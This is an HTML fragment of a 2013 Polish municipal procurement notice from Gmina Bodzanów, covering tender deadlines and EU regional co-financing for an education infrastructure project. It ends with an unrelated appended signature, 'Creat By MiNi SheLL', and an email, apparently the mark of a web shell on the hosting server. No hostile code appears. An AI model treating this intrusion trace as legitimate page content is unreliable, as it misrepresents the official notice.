<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bodzanow.bipgmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Bodzanów z/s ul. Bankowa 7, 09-470 Bodzanów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.09.2013 godzina 10:00, miejsce: Gmina Bodzanów  ul. Bankowa 7, 09-470 Bodzanów Sekretariat Urzędu Gminy w Bodzanowie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany z Europejskiego Funduszu Rozwoju Regionalnego w ramach Priorytetu VII. Tworzenie i poprawa warunków dla rozwoju kapitału ludzkiego Działania 7.2. Infrastruktura służąca edukacji Regionalnego Programu Operacyjnego Województwa Mazowieckiego 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com